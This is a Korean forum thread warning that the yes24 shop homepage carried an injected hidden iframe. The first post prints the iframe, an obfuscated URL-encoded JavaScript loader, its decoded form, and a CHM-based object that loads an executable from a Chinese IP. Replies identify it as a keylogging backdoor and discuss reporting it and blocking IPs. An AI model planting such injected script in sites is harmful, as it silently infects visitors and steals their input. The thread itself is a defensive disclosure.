주의!! yes24 탑페이지 html 소스에 악성코드 박혀있습니다. (해결되었음)

amister의 이미지

친구가 말해줘서 방금 확인해봤더니 진짜 있습니다.

http://www.yes24.co.kr/ 페이지 소스보면 중간에 다음과 같이 들어있습니다.

<iframe height=0 width=0 src="http://218.3.208.183/qqq/index.htm"></iframe>

절대로 IE로 열어보지 마세요. 파이어폭스나 wget 등을 이용하시기 바랍니다.

http://218.3.208.183/qqq/index.htm 의 소스를 보면 다음과 같이 되어있습니다.

<script>
<!--
document.write(unescape("%3CSCRIPT%20LANGUAGE%3D%22JavaScript%22%3E%0D%0A%3C%21--%0D
%0Avar%20HtmlStrings%3D%5B%22%3DPCKFDU%21Xjeui%3E1%21Ifjhiu%3E1%21tuzmf%3E%23ejtqmbz
%3Bopof%3C%23%21uzqf%3E%23ufyu0y.tdsj%22%2C%22qumfu%23%21ebub%3E%23nl%3BANTJUTupsf
%3Bniunm%3Bd%3B%5D/niu%01iuuq%3B00329/4/319/294%22%2C%220rrr0ifmq/uyu%3B%3B0%2634%2
63F%2679%2685n%23%02%3E%3D0PCKFDU%02%3E%0E%0B%22%5D%3B%0D%0Afunction%20psw%2
8st%29%7B%0D%0A%20%20var%20varS%3B%0D%0A%20%20varS%3D%22%22%3B%0D%0A%20%20v
ar%20i%3B%0D%0A%20%20for%28var%20a%3D0%3Ba%3Cst.length%3Ba++%29%7B%0D%0A%20%20
%20%20i%20%3D%20st.charCodeAt%28a%29%3B%20%0D%0A%20%20%20%20if%20%28i%3D%3D1%
29%20%0D%0A%20%20%20%20%20%20varS%3DvarS+String.fromCharCode%28%27%22%27.charCode
At%28%29-1%29%3B%0D%0A%20%20%20%20else%20if%20%28i%3D%3D2%29%20%7B%0D%0A%20
%20%20%20%20%20a++%3B%0D%0A%20%20%20%20%20%20varS+%3DString.fromCharCode%28st.ch
arCodeAt%28a%29%29%3B%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20else%0D%
0A%20%20%20%20%20%20varS+%3DString.fromCharCode%28i-1%29%3B%0D%0A%20%20%7D%0D%0A
%20%20return%20varS%3B%0D%0A%7D%3B%0D%0Avar%20num%3D3%3B%0D%0Afunction%20S%28%
29%7B%0D%0Afor%28i%3D0%3Bi%3Cnum%3Bi++%29%0D%0A%20%20document.write%28psw%28HtmlS
trings%5Bi%5D%29%29%3B%7D%0D%0AS%28%29%3B%0D%0A//%20--%3E%0D%0A%3C/SCRIPT%3E%0
D%0A%0D%0A"));
//-->
</script>

그래서 뭘 escape 해놨나 봤더니 다음과 같더군요.

<script>
<!--
document.write(unescape("<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=PCKFDU!Xjeui>1!Ifjhiu>1!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsj",
"qumfu#!ebub>#nl;ANTJUTupsf;niunm;d;]/niuiuuq;00329/4/319/294","
0rrr0ifmq/uyu;;0&34&3F&79&85n#>=0PCKFDU>"];
function psw(st){
  var varS;
  varS="";
  var i;
  for(var a=0;a<st.length;a++){
    i = st.charCodeAt(a); 
    if (i==1) 
      varS=varS+String.fromCharCode('"'.charCodeAt()-1);
    else if (i==2) {
      a++;
      varS+=String.fromCharCode(st.charCodeAt(a));
      }
    else
      varS+=String.fromCharCode(i-1);
  }
  return varS;
};
var num=3;
function S(){
for(i=0;i<num;i  )
  document.write(psw(HtmlStrings[i]));}
S();
// -->
</SCRIPT>

"));
//-->
</script>

심심해서 저 코드가 스트링을 어떻게 변환하나 봤습니다. 다음과 같이 나옵니다.

<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scri
ptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://218.3.208.183
/qqq/help.txt::/%23%2E%68%74m"></OBJECT>

저게 뭐하는 코드인지는 확실치 않지만, http://218.3.208.183/qqq/help.txt 라는 파일을 다운받아 뭔가 하는 것 같습니다.
다운받아서 파일헤더를 살펴보니 chm 파일이네요.

이 글을 쓰는 현재도 yes24 홈페이지에 저 코드가 박혀있습니다. 이 글 보시는 분들은 IE로 yes24 접속하지 않도록 다른 분들께
주의 부탁드립니다.

File attachments: 
첨부파일 크기
Image icon yes24.gif55.89 KB
cwyang의 이미지

chm화일의 내용으로는

...
CODEBASE="fucksnow.exe"></OBJECT>

이런것이 들어가 있군요

해당 IP는 중국의 서버이고요
--
@뭐지 6-_-

cwyang의 이미지

http://securityresponse.symantec.com/avcenter/venc/data/backdoor.darkmoon.b.html

음. 바이러스군요.. 아직도 있으면 yes24.com에 전화해주는것이..
(키로깅? -_-+++)

pynoos의 이미지

아~ 오늘 책주문할라고 그랬는데....
다행입니다.

cwyang의 이미지

고객센터에 전화를 넣었읍니다.

키보드 로거라서 좀 그렇습니다 -_-

cwyang의 이미지

조치되었네요.

mecanthe의 이미지

바체랑 카브는 잡던데요..

라스베가스를 꿈꾸며...

churack_angel의 이미지

중국놈들 무서워서..
인터넷을 못하겠군요...
왜 우리나라에서 지랄인지..-_ -;;

------------------------------------------------------
조금씩 한발자국씩... 서두르지 않고 천천히... 그렇게...
- By Fallen - :)
http://churack.tistory.com

lacovnk의 이미지

그러면 체크해보라고 공지 해야 하는 것 아닌가요? -o-

다른 것도 아니고 인터넛 상거래 하는 site가 -o- -o-

kirrie의 이미지

어억.. 이거 언제부터 박혀 있던 겁니까? 최근에 yes24 많이 들어갔었는데.. ㅜ.ㅜ

--->
데비안 & 우분투로 대동단결!

망치의 이미지

커헉.. 이럴수가 -_-

저도 최근 자주 들어갔었는데.. 으미야~

---------------------------------------
http://www.waitfor.com/
http://www.textmud.com/

OoOoOo의 이미지

중국쪽 ip 통째로 차단하면 안 되나요.. :evil:

warpdory의 이미지

OoOoOo wrote:
중국쪽 ip 통째로 차단하면 안 되나요.. :evil:

제 경우는 국내 ip 만 빼곤 다 막아요.


---------
귓가에 햇살을 받으며 석양까지 행복한 여행을...
웃으며 떠나갔던 것처럼 미소를 띠고 돌아와 마침내 평안하기를...
- 엘프의 인사, 드래곤 라자, 이영도

즐겁게 놀아보자.

망치의 이미지

warpdory wrote:
OoOoOo wrote:
중국쪽 ip 통째로 차단하면 안 되나요.. :evil:

제 경우는 국내 ip 만 빼곤 다 막아요.


ip 대역좀 알려주세요.. 저도 그러고 싶어요..

---------------------------------------
http://www.waitfor.com/
http://www.textmud.com/

kall의 이미지

망치 wrote:
warpdory wrote:
OoOoOo wrote:
중국쪽 ip 통째로 차단하면 안 되나요.. :evil:

제 경우는 국내 ip 만 빼곤 다 막아요.


ip 대역좀 알려주세요.. 저도 그러고 싶어요..

http://www.ip2nation.com/

----
자신을 이길 수 있는자는
무슨짓이든 할수있다..
즉..무서운 넘이란 말이지 ^-_-^
나? 아직 멀었지 ㅠㅠ

IsExist의 이미지

음. 언제부터 저게 있었던걸까요??? 쩝

---------
간디가 말한 우리를 파괴시키는 7가지 요소

첫째, 노동 없는 부(富)/둘째, 양심 없는 쾌락
셋째, 인격 없는 지! 식/넷째, 윤리 없는 비지니스

이익추구를 위해서라면..

다섯째, 인성(人性)없는 과학
여섯째, 희생 없는 종교/일곱째, 신념 없는 정치

망치의 이미지

kall wrote:
망치 wrote:
warpdory wrote:
OoOoOo wrote:
중국쪽 ip 통째로 차단하면 안 되나요.. :evil:

제 경우는 국내 ip 만 빼곤 다 막아요.


ip 대역좀 알려주세요.. 저도 그러고 싶어요..

http://www.ip2nation.com/

우홍 편리하게도 SQL 파일로 제공되는군요.

---------------------------------------
http://www.waitfor.com/
http://www.textmud.com/

파도의 이미지

218.3.208.xxx 이게 상당히 낯익습니다.

전에 IE 던가 FF 던가 시작하면 연결되었던 기억이 얼핏나는데요.

조금씩 불안해지네요.. :cry:

IE로 페이지를 열면 곧바로 바이러스가 감염되나요?

:cry:

--------Signature--------
시스니쳐 생각 중..

nthroot의 이미지

오오오..이게 머단가..ㅜ_ㅜ

올해도 열심히 우수고객이 되어줬건만..배신을 때리는 yes24 ㅜ_ㅜ

------식은이 처------
길이 끝나는 저기엔 아무 것도 없어요. 희망이고 나발이고 아무 것도 없어.

doongul의 이미지

안티바이러스 프로그램을 실시간으로 돌리고 있었던게 그나마 다행이네요..
급한 일 있어서 들어갈 때 마다 착실하게 파일 삭제해 주면서 들어갔더니.. ^^;
훔...
사람이 안 하던 짓을 할 때는.. 뭔가가 ㅡㅡ;;;;

언제나 좋은날 행복한날 되세요~

coro328의 이미지

지금 또 뭔가 있는거 같던데요.

들어갔더니 차단 시켜버리네요.

Supermania의 이미지

다시또 문제가 발생한 모양입니다 그 이유때문인지는 모르겠지만 긴급 서비스 정검중입니다.

ps. 최근 중국발 windows서버 해킹이 상당히 심한편인데 MS쪽에서 특별한 페치도 없고 답답한사람들이 한둘이 아닌 모양입니다 혹시 아시는 내용들 있으세요??

http://blog.naver.com/p4ssion/40015866029

댓글 첨부 파일: 
첨부파일 크기
Image icon 0바이트

내가 인내하는 만큼 나는 내꿈에 다가서고 있다.